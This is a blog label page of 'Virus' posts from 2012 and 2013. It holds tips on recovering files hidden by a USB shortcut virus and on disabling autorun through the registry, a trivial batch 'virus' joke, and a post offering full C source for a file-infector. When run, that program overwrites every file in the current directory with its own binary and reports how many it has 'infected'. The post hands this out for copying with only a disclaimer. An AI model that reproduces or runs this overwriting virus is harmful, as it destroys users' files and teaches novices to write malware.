Showing posts with label Virus. Show all posts
Showing posts with label Virus. Show all posts

Wednesday, 4 September 2013

Now a days all the people use USB Flash drives like Pendrive, External Hard Disk and Many more. They all skipped DVD, CD and all optical Disc because it takes time to copy and it cannot be re-used. So USB Pendrives are now with all people. Also you can see all over colleges, they hang USB pendrive in their necks. They carry Music, Movies, Data in that. How USB flash drives improves as the mean while USB virus also increases along with that.
Nowadays Some viruses / malwares (may be Trojans, W32.IRCBot.NG)  is spread all over the world which is particularly attacks flash memories like pendrive, memory cards, sd cards and all other usb storage drives.
The main function of this malware is to hide all the files in the flash drive and to store malware, adware, bot, keyloggers in the same flash drive in a file name exactly what you've early in that drive.
For example: Assume that you are inserting a pendrive or your mobile phones memory sd card in a above virus attacked computer or laptop.  those viruses will copy some viruses to your pendrive immediately after inserting your pendrive in that computer, and that virus will start its duty instantly.  First it will hide all the files by setting those files attributes (properties) system files.  Now your system will hide all those files automatically since those are all marked as system files and system files are very necessary to run OS and some application smoothly. 
 Then the virus will store some shortcuts into your pendrive.  Actually those all are not shortcuts, they are all application (virus) instead.  Those shortcuts will be renamed exactly as your files whichever is hidden by this virus.
Below picture is an example how the virus infected pendrive's files will look.

This is to confuse you, sure you'll think these are all the shortcuts for your files stored in your pendrive and the main theme of this confusion is to force you to open those shortcuts (actually virus application).
If you tried to open those shortcuts, nothing will happen, neither your file opens nor any error notifications.  But in background, this virus will run an application which spreads this virus immediately to the computer / laptop you've inserted this pendrive.
You'll get tired and you'll realize that your memory drive is infected with a virus after giving several successful tries to open your files.  Now, you'll sadly decide to format your pendrive. 
But wait..... don't do it....
Your files are safe!!!!!!!!!!!!!
You can still see it!!
Using Manually Infected Hide File Show
Go to Tools>>Folder Options>>  then Check (tick) "Show Hidden Files"  and Unchecked (uptick) "Hide Protected Operating system files" >> Hit Apply >> OK to close the folder option window. (See below picture for guidence)
Be amazed you can now see all your hidden files whatever you thought you've lost.....!!!!!!!
Now you can safely copy your files and folders to your computer but note, the attributes of these files often stay unchanged even if you unchecked hidden attribute on file/folder properties. Those files and folder still marked as system files and again you cant' see these files and folders once you Tick the "Hide Protected Operating system files" .
If it is a Memory SD card of a mobile phone, then the mobile still can't able to show your files while you try to access your memory via your mobile.
don't worry still your files and folders are safe and you can retrieve it back to normal as cleaned one.  I have a solution for it.
Using Command prompt

How To Recover Deleted (Hidden) Files from Virus infected USB Pendrive

Friday, 9 August 2013

USB flash drive is useful because it provides a convenient way for you to bring your data around. However, due to its convenience, it is also a target for viruses and other malware to spread across computers and networks.
protect your system from USB drive virus attack
To effectively prevent the virus in the USB drive from attacking the computer, the best way is to disable the “autorun” feature so virus don’t get activated in the first place. (The virus usually hide itself in the “autorun.inf” file in the USB drive so that it is activated the moment you inserted your USB drive.)
To disable the autorun feature of removable devices, use the following registry fix:
1. Go to Run -> regedit. This will open the Registry Editor.
2. If you want to disable autorun for all users, go to the following key:
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
If you want to disable autorun for only one user, go to the following key:
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
3. Create a new Hex value with the name: NoDriveTypeAutoRun
4. Change the value of the created key to: 4 (HEX)
5. Restart Windows Explorer. This will disable auto run feature for all removable drives.
If you are not adventurous enough to edit the registry, the following tools can monitor the USB ports for USB drive insertion and disable the device until you take additional action to activate it. Some of the tools will be able to detect and disinfect the USB drives from viruses too.

Keep Windows Safe from USB Drive Virus Attack

Saturday, 26 January 2013

How to create or make or write virus are most common question running in or mind if we are a new learner...This is very simple i have given u a small virus code which creates a highly effected virus.....



@echo
:virus
echo VIIIIIRRRRUUUUSSSS

Create Virus using Notepad

Sunday, 2 December 2012









I have type one virus programming just copy it dont run it on your pc.
I am not taking any responcibility


#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %sn”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SECn”,
(end-st)/CLK_TCK);
getch();
}

dont forget to comment

WANT TO MAKE VIRUS IN C????

 
Computer World With IT © 2015 - Designed by Templateism.com